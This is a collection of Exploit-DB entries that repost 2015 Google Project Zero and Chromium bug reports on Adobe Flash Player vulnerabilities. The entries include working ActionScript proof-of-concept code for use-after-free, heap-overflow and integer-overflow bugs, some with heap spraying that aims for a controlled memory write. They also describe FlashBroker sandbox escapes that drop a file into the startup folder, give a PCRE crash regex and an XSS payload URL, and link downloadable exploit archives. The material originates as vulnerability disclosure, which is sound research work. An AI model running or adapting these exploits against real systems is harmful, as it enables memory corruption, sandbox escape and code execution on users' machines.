https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37851.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=349&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

Credit is to KEEN Team.

3 different PoC's in the attached zip.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37849.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=352&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:

var s = SharedObject.getLocal("test");

ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop  :"natalie", myprop2 : "test"};
s.data.fpadInfo = q;
s.flush();
var n = new NetConnection();
ASnative(2100, 200)(s.data);
n.connect.call(s.data, "");
trace(s.data.fpadInfo);
s = 1;

//GC happens here

setInterval(f, 1000);

function f(){

	ASnative(252, 1).call(q); //Array push
	delete q.myprop;
	
	}

A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37850.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=342&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for https://code.google.com/p/chromium/issues/detail?id=480496]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
A little bug while setting the TextFilter.filters array.
Chrome 42.0.2311.90 with Flash 17.0.0.169

VERSION
Chrome Version: 42.0.2311.90 Stable with Flash 17.0.0.169
Operating System: [Win 7 SP1]

REPRODUCTION CASE
We can set the TextFilter.filters array with either an array or a custom object. Providing an object allows an attacker to execute AS2 code in the following loop (these lines come from flashplayer17_sa.exe 17.0.0.169):

.text:004D6964 loc_4D6964:
.text:004D6964                 and     eax, 0FFFFFFF8h
.text:004D6967                 push    edi
.text:004D6968                 mov     edi, eax
.text:004D696A                 mov     ecx, edi
.text:004D696C                 xor     esi, esi
.text:004D696E                 call    xAS2_getArrayLength   ; here we can override object.length and execute some code
.text:004D6973                 test    eax, eax              ; if that code frees the object pointed by ebx...
.text:004D6975                 jle     short loc_4D69A3
.text:004D6977
.text:004D6977 loc_4D6977:
.text:004D6977                 push    edi
.text:004D6978                 mov     ecx, esi
.text:004D697A                 call    sub_4D3FE0            ; get an item from the object
.text:004D697F                 add     esp, 4
.text:004D6982                 test    eax, eax              ; we have either a filter or 0 here
.text:004D6984                 jz      short loc_4D6997
.text:004D6986                 mov     edx, [eax]
.text:004D6988                 mov     ecx, eax
.text:004D698A                 mov     eax, [edx+18h]
.text:004D698D                 call    eax
.text:004D698F                 push    eax
.text:004D6990                 mov     ecx, ebx              ; ...we get a use after free here
.text:004D6992                 call    sub_4CDB70            ; and a write-4 condition here
.text:004D6997
.text:004D6997 loc_4D6997:
.text:004D6997                 mov     ecx, edi
.text:004D6999                 inc     esi
.text:004D699A                 call    xAS2_getArrayLength
.text:004D699F                 cmp     esi, eax
.text:004D69A1                 jl      short loc_4D6977



Freeing the object pointed by ebx is easy indeed:
var tfield:TextField = createTextField("tf",1,1,2,3,4)  //create a TextField at depth 1
tfield.filters = []   //create the targeted object
createTextField("textf",1,1,2,3,4)   //create again a TextField (or any other DisplayObject) at the same depth and Flash frees the targeted object

flash_as2_filters_uaf_write4_poc.swf just crashes the program and flash_as2_filters_uaf_write4.swf crashes while writing to 0x41424344

***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral

import flash.filters.GlowFilter;

var tfield:TextField = createTextField("tf",1,1,2,3,4)

function f() {
	_global.mc.createTextField("tf",1,1,2,3,4)
}

_global.mc = this
_global.counter = 0

var oCounter:Object = new Object()
oCounter.valueOf = function () {
	_global.counter += 1
	if (_global.counter == 1) f()
	return 10;
}

var o = {length:oCounter, 3:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o

***************************************************************************
Content of flash_as2_filters_uaf_write4.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "3"
//It's because Flash CS5.5 does not allow naming a property with a numeral

import flash.filters.GlowFilter;


var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
	a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41414100
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100

for (var i = 0; i<0x200;i++) {
	var tf:TextFormat = new TextFormat()
	a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
	a1[i].tabStops = a2
}


var tfield:TextField = createTextField("tf",1,1,2,3,4)

function f() {
	_global.mc.createTextField("tf",1,1,2,3,4)
	for (var i = 0x100; i<0x200;i++) {
		_global.a1[i].tabStops = _global.a2
	}
}

_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2

var oCounter:Object = new Object()
oCounter.valueOf = function () {
	_global.counter += 1
	if (_global.counter == 1) f()
	return 10;
}

var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}


tfield.filters = o
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37848.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=330&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=476926]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.

This is Issue 457278 resurrected.

VERSION
Chrome Version: [?, Flash 17.0.0.169]
Operating System: [Windows 7 x64 SP1]

REPRODUCTION CASE
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Note: Flash 17.0.0.169 tried to patch the previous issue by setting an "in used" flag on the targeted filter (flashplayer17_sa.exe 17.0.0.169):

.text:004D67F8                 mov     esi, [esp+1Ch+var_4]
.text:004D67FC                 push    1               ; char
.text:004D67FE                 mov     ecx, ebp        ; int
.text:004D6800                 mov     byte ptr [esi+0Ch], 1   // this flag was added
.text:004D6804                 call    xparseAS2Code
.text:004D6809                 mov     byte ptr [esi+0Ch], 0

And when we check the function that deletes the filters:

.text:004D66D0                 push    edi
.text:004D66D1                 mov     edi, ecx
.text:004D66D3                 cmp     byte ptr [edi+0Ch], 0  // check again the flag, and jump if it is set, so that the filter won't be deleted
.text:004D66D7                 jnz     short loc_4D6716
.text:004D66D9                 cmp     dword ptr [edi], 0
.text:004D66DC                 jz      short loc_4D6708

We can bypass that feature with the following code:

flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters   // set the flag to 1

--- in MyGlowFilter ---
	flash.filters.GlowFilter = MyGlowFilter2
	var a = _global.tfield.filters   // set the flag to 1, and then set it to 0
    
    //now we can free the filter :D, the flag is set to 0!
    _global.tfield.filters = []


Tested on Flash Player standalone 17.0.0.169, the updated Chrome is not available at the time of writing.
But since the objects haven't changed too much the updated version should crash while dereferencing 0x41424344.

Can't we call that a -1day :D?

***************************************************************************
Content of FiltusPafusBis.fla

import flash.filters.GlowFilter;

var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
	a2[i] = 0x41424344
}

for (var i = 0; i<0x200;i++) {
	var tf:TextFormat = new TextFormat()
	a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
	a1[i].tabStops = a2
}

var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]


function f() {
	for (var i = 0; i<0x20;i++) {
		_global.a1[0x100+i*4].tabStops = [1,2,3,4]
	}
	flash.filters.GlowFilter = MyGlowFilter2
	var a = _global.tfield.filters
	
	_global.tfield.filters = []
	for (var i = 0; i<0x200;i++) {
		_global.a1[i].tabStops = a2
	}
	
}

_global.tfield = tfield
_global.f = f
_global.a1 = a1
_global.a2 = a2

flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters

***************************************************************************
Content of MyGlowFilter.as:

import flash.filters.GlowFilter;
class MyGlowFilter extends flash.filters.GlowFilter {
       public function MyGlowFilter (a,b,c,d,e,f,g,h) 
       {
            super(a,b,c,d,e,f,g,h);
            _global.f()
       }
}

***************************************************************************
Content of MyGlowFilter2.as:

import flash.filters.GlowFilter;
class MyGlowFilter2 extends flash.filters.GlowFilter {
       public function MyGlowFilter2 (a,b,c,d,e,f,g,h) 
       {
            super(a,b,c,d,e,f,g,h);
       }
}

***************************************************************************
Content of FiltusPafusBis_poc.fla

import flash.filters.GlowFilter;

var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]

function f() {
    flash.filters.GlowFilter = MyGlowFilter2
	var a = _global.tfield.filters
	_global.tfield.filters = []
}

_global.tfield = tfield
_global.f = f

flash.filters.GlowFilter = MyGlowFilter
var a = tfield.filters
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37847.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
Loading a weird MPD file can corrupt flash player's memory.

VERSION
Chrome version 41.0.2272.101, Flash 17.0.0.134
Operating System: Win 7 x64 SP1

REPRODUCTION CASE
I'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.

"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:"

"http://localhost/PlayManifest.swf?file=gen.mpd

"To compile the .as file, I had to use special flags to flex:"

"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as"
"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)"


On Win7 x64 sp1 with Chrome 32 bit, crash like this:
6AA8B67C | 8B C3                    | mov eax,ebx                             |
6AA8B67E | E8 A1 05 00 00           | call pepflashplayer.6AA8BC24            |
6AA8B683 | EB A8                    | jmp pepflashplayer.6AA8B62D             |
6AA8B685 | 89 88 D0 00 00 00        | mov dword ptr ds:[eax+D0],ecx           |  // crash here, eax points somewhere in pepflashplayer.dll
6AA8B68B | 8B 88 88 00 00 00        | mov ecx,dword ptr ds:[eax+88]           |
6AA8B691 | 33 D2                    | xor edx,edx                             |
6AA8B693 | 3B CA                    | cmp ecx,edx                             |
6AA8B695 | 74 07                    | je pepflashplayer.6AA8B69E              |
6AA8B697 | 39 11                    | cmp dword ptr ds:[ecx],edx              |
6AA8B699 | 0F 95 C1                 | setne cl                                |


At first sight this looks to be an uninitialized stack variable but I might be wrong.
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37845.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
Issues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked.

VERSION
Chrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134)
Operating System: Win 7 x64 SP1

REPRODUCTION CASE

Compile the provided poc with flex sdk:
mxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as

And change the bytes in the DefineBitsLossless2 tag, at offset 0x228:
 14 00 14 00 78 to 14 00 14 00 41

To get a DefineBitsLossless tag, change the byte at offset 0x220:
 09 47 00 00 00 to 05 47 00 00 00
 
Load the provided pocs and see the pointers partially disclosed.
 
When handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is.

Look at sub_54732C:

.text:0054746C loc_54746C:
.text:0054746C                 mov     ecx, [esi]
.text:0054746E                 push    0         
.text:00547470                 push    0         
.text:00547472                 push    eax       
.text:00547473                 push    [ebp+var_10]
.text:00547476                 push    [ebp+var_14]
.text:00547479                 push    [ebp+var_C]
.text:0054747C                 call    sub_545459              ; allocate a buffer of 4 * 14h * 14h = 640h
.text:00547481                 cmp     [ebp+var_1], 0
.text:00547485                 mov     ecx, [esi]
.text:00547487                 setnz   al
.text:0054748A                 mov     [ecx+58h], al
...
.text:005474DE loc_5474DE:
.text:005474DE                 lea     eax, [ebp+var_50]
.text:005474E1                 push    0
.text:005474E3                 push    eax
.text:005474E4                 call    xinflate                ; inflate the buffer, but there's no error check?
.text:005474E9                 pop     ecx                     ; thus we can return 0xFFFFFFFD in eax with a corrupt stream
.text:005474EA                 pop     ecx
.text:005474EB                 cmp     eax, 1
.text:005474EE                 jz      short loc_5474FB
.text:005474F0                 test    eax, eax
.text:005474F2                 jnz     short loc_54753A        ; which will skip the buffer initialization


Reading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer.
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37846.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]

VULNERABILITY DETAILS
Use After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.

VERSION
Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
Operating System: Win7 x64 SP1

REPRODUCTION CASE
Use After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.
pepflashplayer.dll 17.0.0.134, based at 0x10000000.

The setSubscribedTags is handled by sub_103255AD:

.text:103255AD                 push    ebp
.text:103255AE                 mov     ebp, esp
.text:103255B0                 and     esp, 0FFFFFFF8h
.text:103255B3                 sub     esp, 14h
.text:103255B6                 push    ebx
.text:103255B7                 mov     ebx, [ebp+arg_0]
.text:103255BA                 push    esi
.text:103255BB                 push    edi
.text:103255BC                 mov     edi, eax
.text:103255BE                 mov     eax, [ebx]
.text:103255C0                 mov     ecx, ebx
.text:103255C2                 call    dword ptr [eax+8Ch]    ; first get the length of the provided array
.text:103255C8                 lea     esi, [edi+4Ch]
.text:103255CB                 mov     [esp+20h+var_C], eax
.text:103255CF                 call    sub_103265BB
.text:103255D4                 mov     esi, [esp+20h+var_C]
.text:103255D8                 test    esi, esi
.text:103255DA                 jz      loc_1032566D
.text:103255E0                 xor     ecx, ecx
.text:103255E2                 push    4
.text:103255E4                 pop     edx
.text:103255E5                 mov     eax, esi
.text:103255E7                 mul     edx
.text:103255E9                 seto    cl
.text:103255EC                 mov     [edi+58h], esi
.text:103255EF                 neg     ecx
.text:103255F1                 or      ecx, eax
.text:103255F3                 push    ecx
.text:103255F4                 call    unknown_libname_129 ;  and then allocate an array of 4*length
.text:103255F9                 and     [esp+24h+var_10], 0
.text:103255FE                 pop     ecx
.text:103255FF                 mov     [edi+54h], eax   ; that pointer is put at offset 0x54 in the object pointed by edi


Next there is a for loop that iterates over the array items and calls the toString() method of each item encountered:

.text:10325606 loc_10325606:
.text:10325606                 mov     eax, [edi+8]
.text:10325609                 mov     eax, [eax+14h]
.text:1032560C                 mov     esi, [eax+4]
.text:1032560F                 push    [esp+20h+var_10]
.text:10325613                 mov     eax, [ebx]
.text:10325615                 mov     ecx, ebx
.text:10325617                 call    dword ptr [eax+3Ch]   ; get the ith element
.text:1032561A                 push    eax
.text:1032561B                 mov     ecx, esi
.text:1032561D                 call    sub_1007205D          ; call element->toString()
.text:10325622                 lea     ecx, [esp+20h+var_8]
.text:10325626                 push    ecx
.text:10325627                 call    sub_10061703
.text:1032562C                 mov     eax, [esp+20h+var_4]
.text:10325630                 inc     eax
.text:10325631                 push    eax
.text:10325632                 call    unknown_libname_129
.text:10325637                 mov     edx, [edi+54h]
.text:1032563A                 pop     ecx
.text:1032563B                 mov     ecx, [esp+20h+var_10]
.text:1032563F                 mov     [edx+ecx*4], eax    ; write a pointer to the string in the array
...
.text:1032565F                 inc     [esp+20h+var_10]
.text:10325663                 mov     eax, [esp+20h+var_10]
.text:10325667                 cmp     eax, [esp+20h+var_C]
.text:1032566B                 jl      short loc_10325606


The issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.

Trigger with that:

    var avss:flash.media.AVSegmentedSource  = new flash.media.AVSegmentedSource ();
    
    var o:Object = new Object();
    o.toString = function():String {
        var a = [0,1,2,3];
        avss.setSubscribedTags(a);
        return "ahahahahah"
    };
    
    var a = [o,1,2,3,4,5,6,7,8,9];
    var i:uint = 0;
    while (i < 0x100000) {
        i++;
        a.push(i);
    }
    avss.setSubscribedTags(a);

Note: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.
    
Compile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.

My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37844.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]

VULNERABILITY DETAILS
An integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.

VERSION
Chrome Version: 41.0.2272.101 stable, Flash 17.0.0.134
Operating System: Win7 x64 SP1

REPRODUCTION CASE

From exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp

944 // Specialized to be called from Function.apply(). 
945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) 
946 { 
947     int32_t argc = a->getLength(); 

...
 
966     // Tail call inhibited by local allocation/deallocation. 
967     MMgc::GC::AllocaAutoPtr _atomv; 
968     Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom));   //here if argc = 0xFFFFFFFF we get an integer overflow
969     atomv[0] = thisArg; 
970     for (int32_t i=0 ; i < argc ; i++ ) 
971         atomv[i+1] = a->getUintProperty(i); 
972     return env->coerceEnter(argc, atomv); 
973 } 


So the idea is to use the rest argument to get a working poc. For example:

    public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {
        
        try {a0.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a1.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a2.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a3.writeUnsignedInt(0x41414141)}catch (e) {}
        try {a4.writeUnsignedInt(0x41414141)}catch (e) {}
        
    }
    public function XApplyPoc() {
        var a:Array = new Array()
       
        a.length = 0xFFFFFFFF
        myFunc.apply(this, a)
    }

Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37843.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

FlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape

1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker

FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.

There is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction.

The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.

2. Credit
Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37842.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

FlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape

1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker

FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.

There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.

The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.

2. Credit
Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.

Proof of Concept:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37841.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

FlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape

1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker

FlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.

There is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers "\" as delimiter. If the destination includes "/", FlashBroker will use a wrong destination folder for check.

The PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.

2. Credit
Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37840.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There’s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.

This issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.

The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.

Simplest testcase that will crash in an ASAN build is the following:

(?(?<a>)?)

This is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.

Regardless, we emit the following bytecode:

0000 5d0012      93 BRA              [18]
0003 5f000c      95 COND             [12]
0006 66         102 BRAZERO          
0007 5e00050001  94 CBRA             [5, 1]
000c 540005      84 KET              [5]
000f 54000c      84 KET              [12]
0012 540012      84 KET              [18]
0015 00           0 END        

When this is executed, we reach the following code:

/* The condition is an assertion. Call match() to evaluate it - setting
the final argument match_condassert causes it to stop at the end of an
assertion. */

else
  {
  RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,
      match_condassert, RM3);
  if (rrc == MATCH_MATCH)
    {
    condition = TRUE;
    ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
    while (*ecode == OP_ALT) ecode += GET(ecode, 1);      <---- ecode is out of bounds at this point.

If we look at the execution trace for this expression, we can see where this code goes wrong:

exec 0x600e0000dfe4 93 [0x60040000dfd0 41]
exec 0x600e0000dfe7 95 [0x60040000dfd0 41]
exec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match
exec 0x600e0000dfeb 94 [0x60040000dfd0 41]
exec 0x600e0000dff0 84 [0x60040000dfd0 41]
exec 0x600e0000dff3 84 [0x60040000dfd0 41]
exec 0x600e0000dff6 84 [0x60040000dfd0 41]
exec 0x600e0000dff9 0 [0x60040000dfd0 41]   <--- recursive match returns
before 0x600e0000dfe7 24067                 <--- ecode == 0x...dfe7
after 0x600e00013dea

If we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.

ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);

In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.

See attached for a crash PoC for the latest Chrome/Flash on x64 linux.

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37839.zip
HireHackking 
source: https://www.securityfocus.com/bid/55667/info

Neturf eCommerce Shopping Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>